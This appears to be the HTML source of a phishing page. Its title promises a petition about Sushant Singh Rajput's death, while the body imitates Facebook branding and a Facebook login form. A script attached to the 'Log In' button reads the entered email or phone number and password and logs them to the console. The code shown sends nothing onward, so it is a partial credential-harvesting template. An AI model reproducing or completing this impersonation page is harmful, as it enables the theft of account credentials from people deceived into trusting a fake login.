<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Petition for Sushant Sing Rajput Death #Bycott Bollywood </title>
  <style>

    #x
     {
      background-color: #3b5699;
      width: 100%;
      height: 55px;
      }
     
    .fac
      {
        color:#fffbff;
        float: left;
        font-size: 40px;
        margin-left: 98px;
        font-family: monospace;
        font-weight: 800;
        
      }
      body
      {
          background-color:#d3d6db ;
      }
      .y
      {
        background-color: #ffffff;
        width: 45%;
        height: 353px;
        margin-left: 248px;
        margin-top: 56px;
        }
        .fu
        {
          text-align: center;
    font-size: 19px;
    margin-left: 186px;
    font-family: monospace;
    position: relative;
    float: left;
    margin-top: 14px;
        }
.for
        {
          float: left;
          margin-top: 24px;
          margin-left: 188px;

        }

#for
{

        
}
@media screen and (max-width: 560px)
{
  body
  {
      width: 96%;
      height:100%;


  }
  #x
     {
      background-color: #3b5699;
    width: 100%;
    height: 69px;
      }
     
      .y
      {
        background-color: #ffffff;
    width: 84%;
    height: -35%;
    margin-left: 18px;
    margin-top: 40px;
      }
      .fu
        {
          text-align: center;
    font-size: 19px;
    margin-left: 55px;
    font-family: monospace;
    float: left;
    margin-top: 16px;
        }
.for
        {
          float: left;
          margin-top: 24px;
          margin-left: 60px;
        }

    .ff
    {
      width: 174px;
    color: white;
    background-color: #3b5699;
    float: left;
    margin-left: -5px;
    }
    #fe
    {
      margin-left: 23px;
    float: left;
    }
    .g
    {
      
      font-family: monospace;
    color: white;
    float: left;
    margin-top: 3px;
    margin-left: 1px;
    }
    .h
    {
      background-color: green;
    float: left;
    width: 90%;
    margin-left: 0px;
    font-size: large;
    height: 30px;
    text-align-last: center;
    border: groove;
   }
   .gh
   {
    color: blue;
    text-decoration: underline;
    float: left;
    margin-left: 20px;
   }
}


  </style>
</head>
<body>
  <div id="x"> 
    <span  class="fac">
    <b> Facebook </b>
    </span> 

  </div>
  <br><br><br>  
  <div class="y">

    <span class="fu"> Login to Facebook</span>
    <span class="for"> 
    <form id="for">
        <input multiple placeholder="email id or number" id="name"><br><br>
        <input type="password" placeholder="password" id="password"><br><br>
        <!-- <input type="submit" value="Log In" onclick="sayhello();" class="ff"> -->

    </form><br>
    <button onclick="sayhello();" class="ff"><b>Log In</b></button><br>
  <span id="fe">----------or----------</span>
  <br>
  <div class="h">
      <span class="g"> <b>Creat New Account</b> </span>
    </div><br><br>
<a href="#"><span class="gh"> Forgotten account? </span></a>
  
  </span>
  
  </div>


  <script type="text/javascript">
  
  function sayhello() {
  var a = document.getElementById("name").value;
  console.log(a);
  var b = document.getElementById("password").value;
  console.log(b);
 }
  
  </script>
</body>
</html>